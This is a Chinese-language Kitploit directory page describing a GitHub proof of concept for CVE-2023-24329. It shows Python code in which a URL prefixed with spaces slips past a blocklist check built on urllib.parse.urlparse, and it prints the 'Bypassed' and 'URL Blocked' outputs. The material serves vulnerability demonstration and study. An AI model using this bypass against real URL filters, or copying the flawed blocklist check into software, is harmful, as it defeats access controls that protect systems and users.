Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-24329-Exploit — 概念验证,演示 Python 的 urllib.parse 中一个 URL 解析绕过漏洞(CVE-2023-24329),该漏洞允许通过前置空格来绕过黑名单。 | Kitploit
工具/GitHubGitHub/pentestmano/cve-2023-24329-exploit
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubpentestmano/cve-2023-24329-exploit

CVE-2023-24329-Exploit

概念验证,演示 Python 的 urllib.parse 中一个 URL 解析绕过漏洞(CVE-2023-24329),该漏洞允许通过前置空格来绕过黑名单。

查看仓库
2年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

简介

URL 解析函数专注于将 URL 字符串拆分为其组成部分,或将 URL 组成部分组合成 URL 字符串。

  • urllib.parse.urlparse

简单来说,urllib.parse 用于解析 URL,我们可以通过在 URL 前添加空格来绕过它。这发生在 Python 3.11.4 及更早版本中。

PoC

让我们分解 example.py

以下是一组你不应访问的网站:

root@kitploit:~
blocked_list = [
    "http://example.com/",
    "http://example2.com/"
]

此函数检查网站是否在阻止列表中,如果在阻止列表中,则应返回 URL Blocked

root@kitploit:~
def is_url_blocked(url):
    parse = urllib.parse.urlparse(url).geturl()
    if  parse in blocked_list: return 'URL Blocked'
    else: return 'Bypassed'

现在我添加了两个 URL,并检查它们中是否有任何一个被阻止且无法访问:

root@kitploit:~
payload1 = "    http://example.com/"
payload2 = "http://example.com/"

print(
    is_url_blocked(payload1),
    "\n",
    is_url_blocked(payload2)
)

payload1 是我绕过 is_url_blocked() 的地方,因为在 URL 前添加长空格会绕过 urllib.parse.urlparse(url).geturl(),它不会按预期执行。 这就是为什么输出是

root@kitploit:~
Bypassed

但在 payload2 上,我们得到

root@kitploit:~
URL Blocked

支持

如果你想通过捐赠支持我,我建议你把它捐给真正需要的人。如果你这样做了,那么请认为我已经赢得了你的支持。

Buy Me A Coffee

下载工具